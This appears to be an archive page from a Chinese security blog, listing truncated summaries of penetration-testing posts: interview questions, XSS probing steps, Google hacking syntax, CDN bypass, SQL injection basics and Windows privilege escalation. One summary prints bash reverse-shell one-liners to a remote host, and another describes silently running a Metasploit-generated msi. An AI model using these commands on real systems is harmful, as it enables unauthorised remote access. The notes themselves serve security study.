摘要:* [HR面](#hr面) * [问题](#问题) * [对我们公司有什么了解,为什么选择本公司](#对我们公司有什么了解为什么选择本公司) * [为什么想要应聘这个职位](#为什么想要应聘这个职位) * [对安全服务是怎么理解的](#对安全服务是怎么理解的) * [如果我不知道渗透测试,两分钟说一
阅读全文
04 2020 档案
摘要:* [HR面](#hr面) * [问题](#问题) * [对我们公司有什么了解,为什么选择本公司](#对我们公司有什么了解为什么选择本公司) * [为什么想要应聘这个职位](#为什么想要应聘这个职位) * [对安全服务是怎么理解的](#对安全服务是怎么理解的) * [如果我不知道渗透测试,两分钟说一
阅读全文
摘要:Bash TCP: Victim:bash -i >& /dev/tcp/1.1.1.1/6666 0>&1 /bin/bash -i > /dev/tcp/1.1.1.1/6666 0<& 2>&1 exec 5<>/dev/tcp/1.1.1.1/6666;cat <&5 | while rea
阅读全文
摘要:1)尝试插入比较正常的HTML标签,例如:<b>,<i>,<u>来看一下返回页面的情况是怎样的,是否被HTML编码了,或者标签被过滤了。 2)尝试插入不闭合的标签,例如:<b,<i,<u,<marquee然后看一下返回响应,是否对开放的标签也有过滤。 3)然后测试几个XSS的payload,基本所有
阅读全文
摘要:* [面试问题记录](#面试问题记录) * [360](#360) * [SQL的存储引擎](#sql的存储引擎) * [SQL注入写shell的条件,用法](#sql注入写shell的条件用法) * [GPC是什么?开启了怎么绕过](#gpc是什么开启了怎么绕过) * [Mysql一个@和两个@什
阅读全文
摘要:* [技术面试问题](#技术面试问题) * [CTF](#ctf) * [说一个印象深刻的CTF的题目](#说一个印象深刻的ctf的题目) * [sql二次注入](#sql二次注入) * [Python](#python) * [爬虫模块、框架、反爬虫机制(IP->代理池、验证码破解、UA)]
阅读全文
摘要:GoogleHacking常用语法 1、intext:(仅针对Google有效) 把网页中的正文内容中的某个字符作为搜索的条件2、intitle: 把网页标题中的某个字符作为搜索的条件3、cache: 搜索搜索引擎里关于某些内容的缓存,可能会在过期内容中发现有价值的信息4、filetype/ext:
阅读全文
摘要:内部邮箱源 一般的邮件系统都在内部,没有经过CDN的解析,通过利用目标网站的邮箱注册、找回密码或者RSS订阅等功能,查看邮件、寻找邮件头中的邮件服务器域名IP,ping这个邮件服务器的域名,就可以获得目标的真实IP。注意:必须是目标自己的邮件服务器,第三方或公共邮件服务器是没有用的。 国外请求 很多
阅读全文
摘要:CDN简介 CDN的全称是Content Delivery Network,即内容分发网络。其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输的更快、更稳定。通过在网络各处放置节点服务器所构成的在现有的互联网基础之上的一层智能虚拟网络,CDN系统能够实时地根据网络流
阅读全文
摘要:在线平台: 第三方平台查询 ip138 https://site.ip138.com/站长工具 http://tool.chinaz.com/subdomain/?domain=hackertarget https://hackertarget.com/find-dns-host-records/t
阅读全文
摘要:whois查询: 域名Whois查询 - 站长之家 http://whois.chinaz.com/爱站网 https://whois.aizhan.com/ip138 https://site.ip138.com/whoislookup https://www.whois.net/icann ht
阅读全文
摘要:结合test.html 引用 ./avlist.js 实现本地在线查询,页面如下: 查询效果如下: test.html: <!DOCTYPE html> <html> <head> <title>getAVName</title> <meta charset="utf-8"> </head> <bo
阅读全文
摘要:不了解NISP二级的我再补充下,其实考题考场与CISP同场同地同题(至少我2019年上半年考的时候是这样)所以NISP二级的题基本就是CISP的题,稳好几套题的知识点也就差不多了。很久之前就拿到证了,今天正好整理磁盘,做个分享,当然如果有考证问题也可以私聊我。 网盘地址:https://www.la
阅读全文
摘要:转载请加原文链接:https://www.cnblogs.com/Yang34/p/12634443.html 请自查前期需要掌握的知识:传参方式:Get 与 post 两种传参方式 注入类型:基于报错注入、基于时间盲注、基于布尔盲注注入位置:url、post 数据、httpheader 信息 My
阅读全文
摘要:转载请加原文链接:https://www.cnblogs.com/Yang34/p/12632849.html sql注入是指web应用程序对用户输入数据的合法性没有判断,导致攻击者可以构造不同的sql语句来实现对数据库的操作。sql注入漏洞产生的条件:用户能够控制数据的输入。原本需要执行的代码,拼
阅读全文
摘要:如果计算机的操作系统版本是vista或者更高,在权限不够的情况下,访问系统的磁盘的根目录,windows目录、programfiles目录,以及读写系统登录数据库的程序等操作,都需要经过user account control,用户账户控制的认证才可以进行 需要UAC的授权才能进行的操作:配置Win
阅读全文
摘要:注册表修改: 注册表查询: msf利用:生成msi文件 获得一个meterpreter会话,上传msi文件Upload /root/yang1.msi 另一窗口如下监听: 进入window执行msi文件msiexec /quiet /qn /i yang1.msi /quiet=在安装期间禁止向用户
阅读全文
摘要:预览: 链接: https://www.lanzous.com/iaxp8ij
阅读全文
|